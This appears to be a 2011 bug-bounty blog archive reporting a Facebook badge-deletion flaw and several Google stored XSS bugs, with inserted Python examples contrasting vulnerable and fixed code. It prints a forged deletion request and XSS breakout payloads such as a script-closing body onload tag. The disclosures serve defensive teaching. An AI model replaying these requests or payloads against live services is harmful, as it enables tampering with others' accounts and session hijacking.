
Thursday, August 25, 2011

Uncrackable? - Exceptional Cracking

Okay, I've been waiting a long time for a case worth posting on my blog. I ran into this one while searching for much less interesting, standard challenges for teaching newbies the basics of RE.
This one is a bit beyond what you guys are used to, and I really want you to give it a try before you read this. If you crack it quickly, don't bother reading; if you already have 3 letters of the serial and you're stuck, start reading from phrase F.

I won't teach you how to use a debugger or how to trace the relevant RE chunk of code; there are tons of tutorials that do just that. You should consider this a case study: what's interesting is the case itself, and my focus will be on it accordingly.
Background:
One of the reasons I chose this crackme is because it "forces" you to focus on discovering the serial itself rather than a 'patch & trash' waste of time; additionally, the serial discovery is special.
Goal:
The goal is to find the serial key. I'll show the entire process, including the method I used and why I chose it, and I'll hand over the correct serial.
CrackMe Download Mirrors:

Friday, April 8, 2011

Facebook Vulnerability - Destroy Any advertisements/badges! (permission issue)

These days Facebook is one of the heaviest engines of advertising; many companies use Facebook to promote their products and even hire people to deal just with that.


I found an attack vector that can be used by any hacker to delete badges/ads from people's or companies' accounts, which will damage every blog or other website embedding them,
because a new badge will have a new "bid", so every website will drop the old badge.

This issue affects the Badges feature,
namely:
Badges Home
Profile Badges
Like Badges
Photo Badges
Page Badges

Vulnerability Details:
A user uses the badges feature to share on Blogger or any other place;
an attacker sees the badge on some website/blog:
<img src="http://badge.facebook.com/badge/1403380007.3098.1711802846.png" width="336" height="84" style="border: 0px;">
Analyzing the picture's name:
The first number, 1403380007, is the victim's Facebook owner ID
(it's easy to get this ID using a simple search on Facebook).
Now the middle number: 3098 is the bid (badge ID).

Now what the attacker needs is to capture a badge-deletion request
and manipulate the "bid" and "owner_id" parameters:

POST /ajax/facebook-widgets/delete_badge.php?__a=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/badges/profile.php?status=new
Origin: http://www.facebook.com
X-SVN-Rev: 349667
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 ....
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mycookie
Content-Length: 137

bid=3098&owner_id=1403380007&post_form_id=073ca00487f1c8fb8903a6ff04ed57be&fb_dtsg=4xsur&lsd&post_form_id_source=AsyncRequest&confirmed=1

A successful badge deletion is then performed on the victim's account.
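The root cause in the request above is that the server trusts the client-supplied owner_id instead of tying ownership to the logged-in session. The following is an added example, not Facebook's code: a hypothetical delete handler written twice, once with the flawed pattern and once with ownership resolved from the session. The badge store, account IDs and function names are constructed for illustration.

```python
# Added example (not Facebook's code): the authorization pattern whose absence
# let a badge-deletion request act on another account's badge. All data is constructed.


class Forbidden(Exception):
    """Raised when the caller is not allowed to act on the requested badge."""


def make_store():
    """Constructed sample data: badge id (bid) -> owning account id."""
    return {3098: 1403380007, 4001: 1403380007, 5120: 555000111}


def delete_badge_vulnerable(store, session_user_id, form):
    """Flawed pattern: ownership is taken from the client-supplied owner_id.
    The server only checks that bid and owner_id agree with each other,
    which any logged-in user can satisfy for somebody else's badge."""
    bid = int(form["bid"])
    owner_id = int(form["owner_id"])
    if store.get(bid) == owner_id:  # consistency check, not an authorization check
        del store[bid]
        return True
    return False


def delete_badge_fixed(store, session_user_id, form):
    """Hardened pattern (hypothetical server logic): the owner is the
    authenticated session user, and the client-supplied owner_id is ignored."""
    bid = int(form["bid"])
    owner = store.get(bid)
    if owner is None or owner != session_user_id:
        # One response for "does not exist" and "not yours", so the endpoint
        # cannot be used to confirm which bids belong to other accounts.
        raise Forbidden("badge not found or not owned by caller")
    del store[bid]
    return True


if __name__ == "__main__":
    # The request shape from the post, replayed by an unrelated account (id 999).
    other_users_form = {"bid": "3098", "owner_id": "1403380007"}
    s = make_store()
    print("vulnerable deleted:", delete_badge_vulnerable(s, 999, other_users_form), "still present:", 3098 in s)
    s = make_store()
    try:
        delete_badge_fixed(s, 999, other_users_form)
    except Forbidden as e:
        print("fixed refused:", e, "still present:", 3098 in s)
```

The lesson generalises to any "delete/update by id" endpoint: an object id in the request identifies the target, but the principal must always come from the session, and a mismatch should be logged as a probable IDOR attempt.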


The Facebook team fixed this issue and thanked me by adding my name to the Facebook WhiteHats thank-you list: Facebook Security WhiteHats

Best Regards,
Ben Hayak 

Saturday, April 2, 2011

Google Security Vulnerability Reward Program: Google Adwords Billing poisoning

Overview
Google Adwords, Google's online advertising service that boosts website traffic and sales, was vulnerable to a persistent XSS in the billing information.

What Had to be done?
The billing information details were vulnerable to a persistent XSS in 5 different fields.
The locations were:
Business name,
Contact name,
both Street Addresses, and City.
This attack was performed by editing the billing information with the right XSS payload (no special bypass required).
This XSS is so persistent that it isn't possible even for the administrator to delete the poisoned billing information.


Screenshot:

This issue has been fixed by Google security team.

I appreciate the opportunity to preserve my skills and gain some more experience
Thank you Google security team.

Tuesday, March 22, 2011

Google Security Vulnerability Reward Program: Take Control Over Adwords Service!

Overview
Google Adwords, Google's online advertising service that boosts website traffic and sales, was vulnerable to a persistent XSS in the main page Dashboard!

What Had to be done?

Well, here I discovered that the Dashboard page stored the Campaigns and the Ad groups as 'widgets', so I went for it and found it was vulnerable. The target of this attack could be anyone in the Adwords service, whether with 'read only', 'standard' or 'Administrator' access. Of course, a member who can edit/add Campaigns can take control over the administrator's account and perform actions with administrator permissions; for example, the attacker could make the administrator grant the attacker admin access with a malicious JavaScript payload, without the need for any user interaction from the administrator. This attack triggers as soon as the admin, or any other victim, enters the Adwords service. This way I could perform session hijacking or take control over the account.

Image triggering the XSS on
vulnerable location #1 (Campaign):


Vulnerable location #2 (Ad Group):

This issue has been fixed by Google security team.

I appreciate the opportunity to preserve my skills and gain some more experience
Thank you Google security team.

Sunday, February 27, 2011

Google Security Vulnerability Reward Program: Google Website Optimizer - Stored XSS

Overview
Google Website Optimizer, Google's free website testing and optimization tool, missed a very important check when people create their experiments; additionally, they made it even easier to exploit.

What Had to be done?

The first step was creating a new experiment (I preferred an A/B Experiment). Then I had an option to add URLs to verify my website is real; at first I inserted some string, "BenHayak" for example, and pressed continue.
After that screen I had an option to throw the dirty job over to my "Webmaster" - "Your Webmaster will install and do the dirty work for you ;)". Great: they give me a link to a Google domain validation page with links to BenHayak; when I clicked it, I noticed it opens a page with only "BenHayak" in the address bar.
Then I made another Experiment filled with many javascript:alert('BenHayak'); URLs and sent this stored XSS report along with a recommendation to always check for "http://" in the input.
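The recommendation to check for "http://" is right in spirit, but a substring test is not enough on its own (javascript:alert('http://') contains it). The following is an added example, not Google's code, of the check done as an allow-list on the parsed scheme; the function names are hypothetical, and the browser-style whitespace normalisation mirrors how browsers read a URL before deciding on its scheme.

```python
# Added example (not Google's code): validating user-supplied site URLs by
# scheme allow-list instead of looking for the substring "http://".
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
MAX_URL_LEN = 2048


def is_safe_site_url(candidate: str) -> bool:
    """True only for absolute http(s) URLs that name a host.

    Rejects plain strings such as "BenHayak", relative paths, protocol-relative
    "//host" and javascript:/data: URIs. Browsers drop tab/newline anywhere in
    a URL and leading/trailing control characters before reading the scheme,
    so the same normalisation is applied here before parsing; otherwise
    "java\tscript:alert(1)" would slip past a naive prefix check.
    """
    if not isinstance(candidate, str) or len(candidate) > MAX_URL_LEN:
        return False
    cleaned = candidate.replace("\t", "").replace("\n", "").replace("\r", "")
    cleaned = cleaned.strip("".join(chr(c) for c in range(0x21)))
    try:
        parts = urlsplit(cleaned)
        host = parts.hostname  # None when there is no netloc
    except ValueError:  # malformed bracketed IPv6 host and similar
        return False
    if parts.scheme not in ALLOWED_SCHEMES:  # urlsplit lowercases the scheme
        return False
    return bool(host)


def filter_site_urls(candidates):
    """Split a submitted list into (accepted, rejected) so the form can report
    exactly which entries were refused instead of silently storing them."""
    accepted = [u for u in candidates if is_safe_site_url(u)]
    rejected = [u for u in candidates if not is_safe_site_url(u)]
    return accepted, rejected


if __name__ == "__main__":
    # Constructed inputs: one legitimate URL, one bare string, one javascript: URI.
    print(filter_site_urls(["http://example.com/", "BenHayak", "javascript:alert('BenHayak')"]))
```

The rejected list is also what a stored value should be checked against at render time: any href that reaches the page must be one that passed this filter, not one that merely sat in the database.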

POC link: Click to trigger the Alert stored xss

Image triggering the XSS:


I appreciate the opportunity to preserve my skills and gain some more experience
Thank you Google security team.

Updates

Well, it's been a couple of weeks since I wanted to update the blog with
new vulnerabilities I found in Google products.
But, as of now, these bugs aren't fixed yet;
I will publish them soon, after Google fixes the issues.

Best regards,
Ben Hayak

Thursday, February 17, 2011

Google Security Vulnerability Reward Program: Google Bookmarks Stored XSS

Overview
Google Bookmarks lets you create online bookmark lists. I found this one in the "New Section" function. In order for this XSS to trigger, though, the victim had to edit your section.

What Had to be done?

The first step was creating a new bookmark list. After I got that done, I created a New section with an image tag poisoned with an XSS payload. The final step was inviting the victim by giving him/her access to my bookmarks list.



This issue has been fixed by Google security team.

I appreciate the opportunity to preserve my skills and gain some more experience
Thank you Google security team.

Wednesday, February 16, 2011

Google Security Vulnerability Reward Program: Google Finance Stored XSS

Overview
Google Finance lets you create Portfolios. After a few tries I figured out a method to trigger XSS using the portfolio name.

What Had to be done?

OK, at first I used different payloads in the Portfolio name but nothing triggered,
but after some more research I found that after I create my Portfolio payload and click on one of the Deposit / Withdraw buttons, my Portfolio name is inserted into this function:

function initPage() {
  initVars();
  dview = google.finance.portfolio.init({
    id: '8',
    expected_hash: 'U66jb3VTR2ZPUjgtaXJqaXRZc2s33VNmVWdjfDEyOTc4NzE22NDk',
    edition: 'us',
    name: '--XSS PAYLOAD--',
    currency: 'USD'
  }, true,
  '/finance/s/7skxqAM7Z8M/chart9.swf?hl=en&gl=us',
  true,
  false,
  ''
  );
}

name: '--XSS PAYLOAD--', so I inserted this payload as the portfolio name: </script><body onload=alert(1)>. There was a filter that, when you insert </script>, made the server remove everything before the </script>.
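The value lands inside a JavaScript string literal in an inline script, and a filter that reacts to </script> by deleting text is a blacklist, not an encoding; the tag itself still reaches the HTML parser, which closes the script element before the JS engine ever sees the string. The following is an added example, not Google's code, of rendering the same init snippet with the value encoded for that context; the template is reproduced only in shape and the function names are hypothetical. The same output-encoding principle (encode for the exact context the value is written into) is what closes the other stored XSS issues on this page as well.

```python
# Added example (not Google's code): encoding a user-controlled value for a
# JavaScript string context inside an inline <script> block.
import json

# Shape of the init snippet from the post, reduced to the fields that matter here.
TEMPLATE = """<script>
function initPage() {{
  dview = google.finance.portfolio.init({{
    id: '8',
    name: {name},
    currency: 'USD'
  }});
}}
</script>"""


def render_naive(name: str) -> str:
    """The flawed pattern: raw interpolation between single quotes.
    Whatever the value contains is emitted into the page verbatim, so the
    HTML parser sees a </script> inside it and ends the element early."""
    return TEMPLATE.format(name="'" + name + "'")


def js_string_literal(value: str) -> str:
    """Encode value as a JS string literal safe to embed in an inline script.

    json.dumps escapes quotes, backslashes and control characters and, with
    ensure_ascii=True, turns every non-ASCII code point (including the U+2028
    and U+2029 line terminators that JS source forbids raw) into \\uXXXX.
    The HTML parser does not interpret JS escapes, so "</" is additionally
    rewritten to "<\\/": the decoded JS value is unchanged, but the sequence
    </script> can no longer appear in the page source."""
    return json.dumps(value, ensure_ascii=True).replace("</", "<\\/")


def render_safe(name: str) -> str:
    """Same snippet with the value encoded for the JS-string context."""
    return TEMPLATE.format(name=js_string_literal(name))


if __name__ == "__main__":
    # Constructed input: the breakout payload described in the post.
    sample = "</script><body onload=alert(1)>"
    print(render_naive(sample))
    print(render_safe(sample))
```

Note that this encoding is specific to a JS string inside a script element; the same value written into an HTML attribute or element body needs HTML entity encoding instead, and a value used in both places needs both, applied per context.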


I appreciate the opportunity to preserve my skills and gain some more experience
Thank you Google security team.